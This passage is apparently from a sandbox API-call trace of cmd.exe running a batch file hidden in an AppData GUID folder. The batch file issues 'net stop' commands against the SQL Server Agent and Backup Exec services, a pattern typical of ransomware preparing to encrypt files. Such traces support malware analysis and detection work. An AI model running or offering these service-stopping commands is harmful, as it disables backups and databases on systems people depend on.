fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.206] GetLastError () returned 0x2 [0197.206] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.206] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0197.206] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.207] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.207] GetLastError () returned 0x2 [0197.207] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0197.207] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.208] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.209] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0197.209] SetErrorMode (uMode=0x0) returned 0x1 [0197.209] GetProcessHeap () returned 0x3e0000 [0197.209] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0197.209] GetProcessHeap () returned 0x3e0000 [0197.209] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0197.209] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.209] GetProcessHeap () returned 0x3e0000 [0197.209] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0197.209] GetProcessHeap () returned 0x3e0000 [0197.209] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0197.209] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.210] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.210] GetLastError () returned 0x2 [0197.210] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.210] GetLastError () returned 0x2 [0197.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.211] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0197.211] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0197.212] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.212] GetLastError () returned 0x2 [0197.212] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0197.212] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0197.213] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.213] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0197.213] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0197.213] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0197.213] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0197.213] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLSERVERAGENT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLSERVERAGENT /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLSERVERAGENT /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa08, dwThreadId=0xa14)) returned 1 [0197.217] CloseHandle (hObject=0x74) returned 1 [0197.217] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0197.217] GetProcessHeap () returned 0x3e0000 [0197.217] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.217] GetEnvironmentStringsW () returned 0x3f8408* [0197.217] GetProcessHeap () returned 0x3e0000 [0197.217] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.217] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.217] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0197.437] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0197.437] CloseHandle (hObject=0x78) returned 1 [0197.438] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0197.443] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0197.443] GetProcessHeap () returned 0x3e0000 [0197.444] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.444] GetEnvironmentStringsW () returned 0x3f8408* [0197.444] GetProcessHeap () returned 0x3e0000 [0197.444] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.444] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.444] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0197.444] GetProcessHeap () returned 0x3e0000 [0197.444] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.444] GetEnvironmentStringsW () returned 0x3f8408* [0197.444] GetProcessHeap () returned 0x3e0000 [0197.444] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.444] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.444] GetProcessHeap () returned 0x3e0000 [0197.444] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0197.444] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0197.444] _get_osfhandle (_FileHandle=1) returned 0x264 [0197.444] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0197.444] _get_osfhandle (_FileHandle=1) returned 0x264 [0197.444] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0197.444] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0197.444] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0197.445] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0197.445] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0197.445] SetConsoleInputExeNameW () returned 0x1 [0197.445] GetConsoleOutputCP () returned 0x1b5 [0197.445] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0197.445] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0197.446] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0197.446] _get_osfhandle (_FileHandle=3) returned 0x78 [0197.446] SetFilePointer (in: hFile=0x78, lDistanceToMove=2538, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ea [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0197.446] GetProcessHeap () returned 0x3e0000 [0197.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0197.446] _get_osfhandle (_FileHandle=3) returned 0x78 [0197.446] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ea [0197.446] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xed7, lpOverlapped=0x0) returned 1 [0197.447] SetFilePointer (in: hFile=0x78, lDistanceToMove=2579, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa13 [0197.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=41, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop BackupExecManagementService /y\r\n\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 41 [0197.448] _get_osfhandle (_FileHandle=3) returned 0x78 [0197.448] GetFileType (hFile=0x78) returned 0x1 [0197.448] _get_osfhandle (_FileHandle=3) returned 0x78 [0197.448] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa13 [0197.448] GetProcessHeap () returned 0x3e0000 [0197.448] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0197.448] GetProcessHeap () returned 0x3e0000 [0197.448] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0197.451] _tell (_FileHandle=3) returned 2579 [0197.452] _close (_FileHandle=3) returned 0 [0197.452] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0197.452] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0197.452] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0197.452] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0197.452] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0197.452] _wcsicmp (_String1="net", _String2="CD") returned 11 [0197.452] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0197.452] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0197.452] _wcsicmp (_String1="net", _String2="REN") returned -4 [0197.452] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0197.452] _wcsicmp (_String1="net", _String2="SET") returned -5 [0197.452] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0197.452] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0197.452] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0197.452] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0197.452] _wcsicmp (_String1="net", _String2="MD") returned 1 [0197.452] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0197.452] _wcsicmp (_String1="net", _String2="RD") returned -4 [0197.452] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0197.452] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0197.452] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0197.452] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0197.452] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0197.452] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0197.452] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0197.452] _wcsicmp (_String1="net", _String2="VER") returned -8 [0197.452] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0197.452] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0197.452] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0197.452] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0197.452] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0197.452] _wcsicmp (_String1="net", _String2="START") returned -5 [0197.452] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0197.453] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0197.453] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0197.453] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0197.453] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0197.453] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0197.453] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0197.453] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0197.453] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0197.453] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0197.453] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0197.453] SetErrorMode (uMode=0x0) returned 0x1 [0197.454] GetProcessHeap () returned 0x3e0000 [0197.454] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0197.454] GetProcessHeap () returned 0x3e0000 [0197.454] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0197.454] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.454] GetProcessHeap () returned 0x3e0000 [0197.454] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0197.454] GetProcessHeap () returned 0x3e0000 [0197.454] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0197.454] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.455] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.455] GetLastError () returned 0x2 [0197.455] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.455] GetLastError () returned 0x2 [0197.456] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.456] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0197.456] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.457] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.457] GetLastError () returned 0x2 [0197.457] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0197.457] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.458] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.458] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0197.458] SetErrorMode (uMode=0x0) returned 0x1 [0197.459] GetProcessHeap () returned 0x3e0000 [0197.459] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0197.459] GetProcessHeap () returned 0x3e0000 [0197.459] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0197.459] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.459] GetProcessHeap () returned 0x3e0000 [0197.459] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0197.459] GetProcessHeap () returned 0x3e0000 [0197.459] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0197.459] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.460] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.460] GetLastError () returned 0x2 [0197.460] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.460] GetLastError () returned 0x2 [0197.461] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.461] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0197.461] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.462] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.462] GetLastError () returned 0x2 [0197.462] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0197.462] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.462] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.463] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0197.463] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0197.463] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0197.463] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0197.463] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop BackupExecManagementService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop BackupExecManagementService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop BackupExecManagementService /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x898, dwThreadId=0x8cc)) returned 1 [0197.467] CloseHandle (hObject=0x78) returned 1 [0197.467] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0197.467] GetProcessHeap () returned 0x3e0000 [0197.467] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.467] GetEnvironmentStringsW () returned 0x3f8408* [0197.467] GetProcessHeap () returned 0x3e0000 [0197.467] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.467] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.467] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0197.623] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0197.623] CloseHandle (hObject=0x74) returned 1 [0197.623] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0197.623] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0197.623] GetProcessHeap () returned 0x3e0000 [0197.623] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.623] GetEnvironmentStringsW () returned 0x3f8408* [0197.624] GetProcessHeap () returned 0x3e0000 [0197.624] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.624] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.624] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0197.624] GetProcessHeap () returned 0x3e0000 [0197.624] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.624] GetEnvironmentStringsW () returned 0x3f8408* [0197.624] GetProcessHeap () returned 0x3e0000 [0197.624] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.624] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.624] GetProcessHeap () returned 0x3e0000 [0197.624] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0197.624] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0197.624] _get_osfhandle (_FileHandle=1) returned 0x264 [0197.624] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0197.624] _get_osfhandle (_FileHandle=1) returned 0x264 [0197.624] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0197.624] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0197.624] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0197.625] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0197.625] SetConsoleMode 